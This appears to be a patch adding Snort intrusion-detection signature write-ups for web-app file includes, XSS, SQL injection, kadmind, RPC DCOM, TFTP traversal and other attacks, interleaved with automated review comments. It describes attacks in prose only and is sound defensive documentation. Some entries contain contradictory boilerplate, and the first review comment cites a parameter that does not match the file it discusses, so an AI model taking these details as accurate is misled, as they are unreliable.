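Review bot: The third Detailed Information paragraph (credential validation of a client host) is generic CGI boilerplate that contradicts the first paragraph, which correctly describes a remote file include via the "theme_root" parameter; drop it or move it below the specific text. "running ona web server" is missing a space, Affected Systems should name the Harpia versions rather than "All systems running CGI applications using Harpia", and Additional References is empty for a named vulnerability. Layout: the "--" separators after the Sid and Affected Systems blocks lack the blank line used elsewhere in the patch.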
--- /dev/null
+++ b/doc/signatures/100000508.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+100000508
+--
+Summary:
+This event is generated when an attempt is made to access the file "wakka.php 
+which contains known vulnerabilities in the "Wikkawiki" application running on 
+a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to access a file with known 
+vulnerabilities from a remote machine used by the "Wikkawiki" application 
+running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Wikkawiki
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
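Review bot: The Summary opens a quote on "wakka.php and never closes it. Detailed Information, "access a file with known vulnerabilities from a remote machine", does not say what the vulnerabilities are or which parameter the rule keys on, while the rest of the text is the same CGI boilerplate as the other 1000005xx entries; state what the rule matches in wakka.php and add a reference. "running ona web server" is missing a space, and the "--" separators after Sid and Affected Systems lack the blank line used elsewhere.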
--- /dev/null
+++ b/doc/signatures/100000557.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000557
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "VebiMiau" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "f_user" parameter in the "index.php" script 
+used by the "VebiMiau" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using VebiMiau
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
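Review bot: Impact and the second Detailed Information paragraph are the remote-file-include template ("system integrity compromise", "execute system binaries or malicious code") and overstate a cross site scripting bug; Attack Scenarios describes the real effect (a malicious link that steals information from the user who clicks it), so Impact should describe script execution in the victim's browser and theft of that user's data, not code execution on the server. "attackers choosing" should be "attacker's choosing".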
--- /dev/null
+++ b/doc/signatures/2174.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2176
+
+
+--
+Summary:
+This event is generated when an attempt is made to access a system
+file via SMB. 
+
+--
+Impact:
+Serious. This file contains important operating system information.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to access a file
+containing important operating system information using SMB across the
+network.
+
+--
+Affected Systems:
+Microsoft Windows systems.
+
+--
+Attack Scenarios:
+If this file is accessible via SMB the attacker can manipulate the
+operating system registry settings.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+Microsoft Technet
+http://support.microsoft.com/support/kb/articles/q153/1/83.asp
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0562
+Winreg
+http://www.rutherfurd.net/python/winreg/
+
+
+--
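Review bot: The Sid block says 2176 but the file is doc/signatures/2174.txt; one of them is wrong. The entry never names the "system file" the rule matches: Summary says "a system file", Detailed Information "a file containing important operating system information", Attack Scenarios "this file", and only the winreg and CAN-1999-0562 references hint at the registry. Name the file in Summary so the analyst knows what access was attempted. The Additional References block also lacks the blank lines between entries used elsewhere in the patch.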
--- /dev/null
+++ b/doc/signatures/1205.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1205
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
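Review bot: This entry is word-for-word the same as doc/signatures/1507.txt in this patch, so nothing distinguishes sid 1205 from sid 1507; add what the rule matches to Summary and a reference link. "running ona web server" in Detailed Information is missing a space.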
--- /dev/null
+++ b/doc/signatures/2990.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2990
+
+--
+Summary:
+This event is generated when an attempt is made to bind to the winreg
+service.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to bind to the RPC
+service for winreg.
+
+--
+Affected Systems:
+	Windows systems
+
+--
+Attack Scenarios:
+An attacker may attempt to bind to the service to manipulate host
+settings.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+Microsoft Technet
+http://support.microsoft.com/support/kb/articles/q153/1/83.asp
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0562
+Winreg
+http://www.rutherfurd.net/python/winreg/
+
+--
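Review bot: Impact says "Unknown." while Attack Scenarios says the attacker binds to winreg "to manipulate host settings" and the references cite CAN-1999-0562; state the impact (remote read or modification of the registry) rather than leaving it unknown. Detailed Information only repeats the Summary; it should say how the bind reaches the host, which would also explain why Corrective Action blocks 139 and 445 as well as 135. Additional References lacks the blank lines between entries used elsewhere.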
--- /dev/null
+++ b/doc/signatures/1896.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid: 1896
+
+--
+Summary:
+This event is generated when an attempt is made to exploit 
+vulnerable versions of the Kerberos version 4 administration daemon 
+(kadmind).
+
+--
+Impact:
+Serious. System compromize presenting the attacker with the opportunity to execute arbitrary code or gain unauthorized access to the target host along with other hosts in the kerberos realm.
+
+--
+Detailed Information:
+kadmind is used to administer a Kerberos database on the master key distribution center (KDC) of a kerberos realm.
+
+A buffer overflow condition exists in kadmind4 such that when the daemon parses a length value in an administration request the attacker can gain the ability to execute arbitrary code with the privileges of the user running the daemon, usually root.
+
+Authentication is not required to cause the overflow.
+
+Affected Systems:
+	Multiple vendors using kadmind version 4
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2002-29.html
+http://www.kb.cert.org/vuls/id/875073
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1235
+
+--
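Review bot: The "--" separator between Detailed Information and Affected Systems is missing (Affected Systems follows "Authentication is not required to cause the overflow." directly), which will break anything that splits these files on "--". "Sid: 1896" is on one line whereas every other entry puts the number on its own line. "compromize" in Impact should be "compromise". Attack Scenarios ("Exploit scripts are available") duplicates Ease of Attack and is not a scenario; describe the unauthenticated administration request carrying the bad length value from Detailed Information instead.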
--- /dev/null
+++ b/doc/signatures/1778.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+1778
+
+--
+Summary:
+This event is generated when an attempt is made to cause a Denial of Service (DoS) to an FTP server.
+
+--
+Impact:
+Serious. Denial of Service.
+
+--
+Detailed Information:
+Certain versions of Microsoft's IIS FTP service are vulnerable to a DoS attack. The condition exists when a user attempts to view the transfer status using the STAT command. If the user enters a large number of file globbing characters as an argument, the service will crash.
+
+--
+Affected Systems:
+	Microsoft IIS versions 4.0, 5.0, and 5.1
+	Cisco Building Broadband Service Manager 4.0.1 - 5.1
+	Cisco Call Manager 3.0 - 3.2
+	Cisco Unity Server 2.0 - 2.4
+
+--
+Attack Scenarios:
+An attacker can cause the service to restart or hang, leaving the service unavailable to users.
+
+--
+Ease of Attack:
+Medium
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/4482
+
+--
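Review bot: Affected Systems lists three Cisco products under an entry whose Detailed Information only discusses Microsoft IIS FTP; add a sentence saying why they are affected, otherwise the list reads as a copy error. Ease of Attack "Medium" is the only rating in this patch that is not "Simple" and gives no reason; given the STAT-plus-globbing description, say what makes it harder. The "-- " separator before Additional References has a trailing space, and a CVE link beside the Bugtraq one would help.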
--- /dev/null
+++ b/doc/signatures/282.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+
+282
+
+--
+Summary:
+This event is generated when an attempt is made to issue a Denial of 
+Service (DoS) attack against a host running Arkiea backup software.
+
+--
+Impact:
+Denial of Service
+
+--
+Detailed Information:
+
+Arkiea package is a backup application that is used to manage backups 
+for a number of systems. A Denial of Service (DoS) vulnerability
+exists in nlservd program, if fed with large inputs, will cause a 
+program to crash.
+
+A vulnerability in the nlservd from the Arkiea backup application allows
+remote users to shut it down by sending it large amounts of input over 
+the network.
+
+--
+Affected Systems:
+
+	Arkeia 4.0
+	Arkeia 4.1	
+
+--
+Attack Scenarios:
+
+An attacker sends a overly large strings to a nlservd daemon, the 
+service will crash immediately.
+
+--
+Ease of Attack:
+
+Simple.
+
+--
+False Positives:
+
+None known
+
+--
+False Negatives:
+
+None known
+
+--
+Corrective Action:
+ 
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Original Rule Writer Paul Bobby paul.bobby@lmco.com
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/662
+
+--
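Review bot: The product is spelled "Arkiea" in Summary and Detailed Information but "Arkeia" in Affected Systems; pick one. The two Detailed Information paragraphs say the same thing twice and the first is ungrammatical ("exists in nlservd program, if fed with large inputs, will cause a program to crash"); merge them into one sentence. Attack Scenarios "sends a overly large strings to a nlservd daemon" should be "sends an overly large string to the nlservd daemon". The blank line after each section heading is not used by the other entries in this patch.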
--- /dev/null
+++ b/doc/signatures/3339.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3339
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
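Review bot: Attack Scenarios ("a request for a file with an overly long filename via a network share") does not match the malformed RPC DCOM request described in Detailed Information; the same mismatched text appears in 2350.txt. Additional References is empty although the 2350.txt entry for the same vulnerability cites MS03-026, CAN-2003-0352 and the Symantec Blaster page; copy those here. "Expoit" in Ease of Attack is a typo.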
--- /dev/null
+++ b/doc/signatures/520.txt
@@ -0,0 +1,52 @@
+Rule:
+
+--
+Sid:
+520
+
+--
+Summary:
+This event is generated when a TFTP request is made with a directory designation of "/".  This may be an indication of an attempt to request or place files on the TFTP server outside the root directory configured for the TFTP server.
+
+--
+Impact:
+TFTP servers that allow files to be placed outside the configured root directory for the server may allow remote attackers to execute arbitrary commands on the system.  Additionally if the TFTP server allows directory transversal using the "/" designator it may be possible to retrieve files from other directories on the system.
+
+--
+Detailed Information:
+This rule searches for a "/" payload in TFTP requests.  Vulnerable TFTP servers may allow remote attackers to transfer files to directories outside the normal root directory configured for the TFTP server.  This could result in sensitive files being transfered off the system or arbitrary files being upload to the system.
+
+--
+Attack Scenarios:
+Using the "/" designator it may be possible to fool vulnerable TFTP server into placing files or retrieving files from outside the TFTP configured root directory.  Normally an attacker will attempt to retrieve sensitive system files such as "/etc/passwd" or "/etc/shadow" after determining if this attack vector is successful.  
+
+--
+Ease of Attack:
+Simple: Numerous tools and automated scripts exist for scanning large subnets for improperly configured TFTP servers.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives
+None Known
+
+--
+Corrective Action:
+Upgrade to the current version of your TFTP server solution, or contact the product vendor for patch information.
+
+Contributers:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski Matt.Watchinski@sourcefire.com
+
+Additional References
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0183
+
+Arachnids:
+http://www.whitehats.com/info/IDS138
+
+--
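Review bot: The "--" separators before "Contributers:" and "Additional References" are missing, "False Negatives" lacks its colon, and "Contributers" is misspelled, so this file will not parse like the others. There is no Affected Systems section at all. Typos: "transversal" (traversal) in Impact, "transfered" and "being upload" (uploaded) in Detailed Information. Detailed Information says the rule "searches for a "/" payload" while Summary says "a directory designation of "/""; state exactly which (a filename beginning with "/", or any "/" in the filename) so the reader can judge false positives.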
--- /dev/null
+++ b/doc/signatures/420.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+
+Sid:
+420
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP Mobile Host Redirect datagram with an undefined ICMP code.
+
+--
+
+Impact:
+
+Undefined ICMP Code values should never be seen on the network.  This could be an indication of nefarious activity on the network.
+
+--
+
+Detailed Information:
+The Transparent Internet Routing for IP Mobile Hosts IETF draft defines ICMP Type 32 Code 0 as an ICMP Mobile Host Redirect Message.  This message was intended to be used by mobile computers to inform base-stations of their location on the network as they move from base-station to base-station.  In normal situations the ICMP Code should be set to 0, values other than 0 are undefined and should never be used.
+
+This IETF draft was never ratified, and no hardware is known to exist that generates this type of ICMP datagram
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+ICMP Type 32 datagrams are not normal network activity.  Hosts generating these types of datagrams should be investigated for nefarious activity
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
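Review bot: "Attack Scenarios: None known" contradicts "Ease of Attack: Numerous tools and scripts can generate this type of ICMP datagram"; either describe what an attacker gains from sending Type 32 datagrams with undefined codes, or state that no scenario is known and drop the tools claim. The sentences "no hardware is known to exist that generates this type of ICMP datagram" and "Hosts generating these types of datagrams should be investigated for nefarious activity" are missing their terminating periods, and the False Negatives block lacks the blank line before "--" that every other section in this file has. "Additional References: None" could at least name the IETF draft that the Detailed Information relies on, since that is the only source for the Type 32 definition.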
--- /dev/null
+++ b/doc/signatures/100000861.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000861
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "FlushCMS" application running on a webserver. Access to the file "class.rich.php" using a remote file being passed as the "class_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "class_path" parameter in the "class.rich.php" script used by the "FlushCMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using FlushCMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
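Review bot: the Detailed Information section pairs the specific remote file include description with a generic paragraph about "validating the credentials of a client host", and the Attack Scenarios text ("supply his/her own credentials to gain access") describes an authentication bypass, not a remote file include through the "class_path" parameter; replace both with the file-include scenario the rule actually detects. Formatting: the file begins with two blank lines, the "Sid" and "Affected Systems" blocks lack the blank line before "--", and "has been attempted" after "an exploitation attempt" should be "has been made". Typos: "ona" (on a), "attackers choosing" (attacker's choosing). Additional References is empty; the advisory for the FlushCMS "class.rich.php" issue should be cited so the "None known" false-positive claim can be checked.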
--- /dev/null
+++ b/doc/signatures/2812.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2812
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure validate_for_local_flavor
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
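Review bot: the procedure name is split from its sentence, with "validate_for_local_flavor" on one line and ". This procedure is included in" starting the next, which looks like a template-substitution artifact; join it so it reads "vulnerability in the procedure validate_for_local_flavor. This procedure is included in dbms_repcat." The Affected Systems entry "Oracle Oracle9i" repeats the vendor name. "Rule: ", "Sid: " and several "-- " separators carry trailing whitespace, and "Apply the appropriate vendor supplied patch" has no terminating period. Additional References is empty although the text describes a known vendor-patched vulnerability; the vendor alert should be cited.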
--- /dev/null
+++ b/doc/signatures/100000824.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000824
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "VBZooM" application running on a webserver. Access to the file "sendmail.php" with SQL commands being passed as the "UserID" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "UserID" parameter in the "sendmail.php" script used by the "VBZooM" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VBZooM
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
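Review bot: the second Detailed Information paragraph is a comma splice ("...compromise the database backend for the application, the attacker may also be able to execute system binaries..."); split it into two sentences. The third paragraph, about validating client credentials, is the generic CGI template and does not describe SQL injection through the "UserID" parameter; it should be dropped or replaced with text about the injection point. As in the other generated "100000xxx" entries: remove the two leading blank lines, add the blank line before "--" in the Sid and Affected Systems blocks, and fix "ona" (on a), "attackers choosing" (attacker's choosing) and "has been attempted" (has been made). The generic SQL injection article is a reasonable background reference, but an advisory for the VBZooM "sendmail.php" issue itself is missing.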
--- /dev/null
+++ b/doc/signatures/122-23.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-23
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically a udp
+filtered portsweep was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
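Review bot: spelling and redundancy in the prose: "reconnaisance" should be "reconnaissance", "consititute" should be "constitute", "a targeted attack against the targeted systems" repeats "targeted", and "Apply any appropriate vendor supplied patches as appropriate" repeats "appropriate". Since this event comes from the sfPortscan preprocessor rather than a payload rule, Corrective Action should also point at the tuning guidance in README.sfportscan that Detailed Information already cites, so that the sanctioned-scanner case raised under False Positives has a concrete follow-up. The file also starts with two blank lines.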
--- /dev/null
+++ b/doc/signatures/100000679.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000679
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Harpia" application running on a webserver. 
+Access to the file "index.php" using a remote file being passed as the 
+"func_prog" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "func_prog" parameter in the "index.php" script used by 
+the "Harpia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Harpia
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
